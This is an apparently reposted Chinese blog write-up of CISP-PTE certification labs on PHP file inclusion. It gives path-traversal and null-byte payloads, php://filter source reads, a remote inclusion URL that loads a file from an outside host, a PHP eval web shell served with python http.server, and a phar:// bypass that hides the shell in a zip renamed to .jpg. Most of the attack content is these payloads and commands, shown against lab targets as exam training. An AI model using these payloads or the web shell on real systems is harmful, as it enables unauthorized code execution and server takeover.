当前位置:网站首页>2022 CISP-PTE(一)文件包含

2022 CISP-PTE(一)文件包含

2022-06-27 06:26:00 Aτθ

一、本地文件包含(基础)

在这里插入图片描述

1、第一道

在这里插入图片描述

2、第二道

....//....//flag.txt

在这里插入图片描述

3、第三道

....//....//flag.txt%00

在这里插入图片描述
在这里插入图片描述

4、第四道

....//....//....//flag.txt%00

在这里插入图片描述

在这里插入图片描述

二、本地文件包含(实操)

1、第一道

在这里插入图片描述
在这里插入图片描述

php://filter/convert.base64-encode/resource=../key.php

在这里插入图片描述
在这里插入图片描述

2、第二道

在这里插入图片描述
在这里插入图片描述

2.1 查看答题页面源码

查看答题页面源码,无任何有用信息。

在这里插入图片描述
在这里插入图片描述

直接访问view.html文件,并查看源代码。

在这里插入图片描述

在这里插入图片描述
在这里插入图片描述

2.2 传入参数

在这里插入图片描述
在这里插入图片描述

2.3 查看源码

在这里插入图片描述

三、远程文件包含(实操)

1、第一道

1.1 打开题目

在这里插入图片描述
在这里插入图片描述

1.2 初步尝试

在这里插入图片描述
在这里插入图片描述

1.3 远程文件包含

无法进行截断,换用远程文件包含。

在这里插入图片描述
在这里插入图片描述

1.4 蚁剑链接

http://49.235.78.245:1117/start/index.php?page=http://49.235.78.245/1

在这里插入图片描述

在这里插入图片描述
在这里插入图片描述

2、本地启动一个远程服务器

2.1 在用户目录下放一句话

1.txt
<?php @eval($_POST['c']);?>

目录:
C:\Users\Administrator

在这里插入图片描述

2.2 启动

python3执行:python3 -m http.server
python2执行: python2 -m SimpleHTTPServer

在这里插入图片描述
在这里插入图片描述

2.3 成功

http://192.168.1.107:8000/1.txt

在这里插入图片描述

3、第二道

3.1 查看题目源码

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

3.2 读取include.php和upload.php源码

php://filter/convert.base64-encode/resource=include

在这里插入图片描述
在这里插入图片描述

<html>
Tips: the parameter is file! :) 
<!-- upload.php -->
</html>
<?php
    @$file = $_GET["file"];
    if(isset($file))
    {
    
        if (preg_match('/http|data|ftp|input|%00/i', $file) || strstr($file,"..") !== FALSE || strlen($file)>=70)
        {
    
            echo "<p> error! </p>";
        }
        else
        {
    
            include($file.'.php');
        }
    }
?>

在这里插入图片描述

<form action="" enctype="multipart/form-data" method="post" 
name="upload">file:<input type="file" name="file" /><br> 
<input type="submit" value="upload" /></form>

<?php
if(!empty($_FILES["file"]))
{
    
    echo $_FILES["file"];
    $allowedExts = array("gif", "jpeg", "jpg", "png");
    @$temp = explode(".", $_FILES["file"]["name"]);
    $extension = end($temp);
    if (((@$_FILES["file"]["type"] == "image/gif") || (@$_FILES["file"]["type"] == "image/jpeg")
    || (@$_FILES["file"]["type"] == "image/jpg") || (@$_FILES["file"]["type"] == "image/pjpeg")
    || (@$_FILES["file"]["type"] == "image/x-png") || (@$_FILES["file"]["type"] == "image/png"))
    && (@$_FILES["file"]["size"] < 102400) && in_array($extension, $allowedExts))
    {
    
        move_uploaded_file($_FILES["file"]["tmp_name"], "upload/" . $_FILES["file"]["name"]);
        echo "file upload successful!Save in: " . "upload/" . $_FILES["file"]["name"];
    }
    else
    {
    
        echo "upload failed!";
    }
}
?>

3.3 上传文件

180.php:
<?php @eval($_POST['c']);?>

1180.php写一句话;
2180.php压缩为180.zip;
3、改写180.zip为180.jpg

在这里插入图片描述

3.4 读取文件

?file=phar://upload/180.jpg/180
c=phpinfo();

在这里插入图片描述

3.5 链接蚁剑

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

原网站

版权声明
本文为[Aτθ]所创,转载请带上原文链接,感谢
https://blog.csdn.net/weixin_51730169/article/details/125468220

边栏推荐

猜你喜欢

随机推荐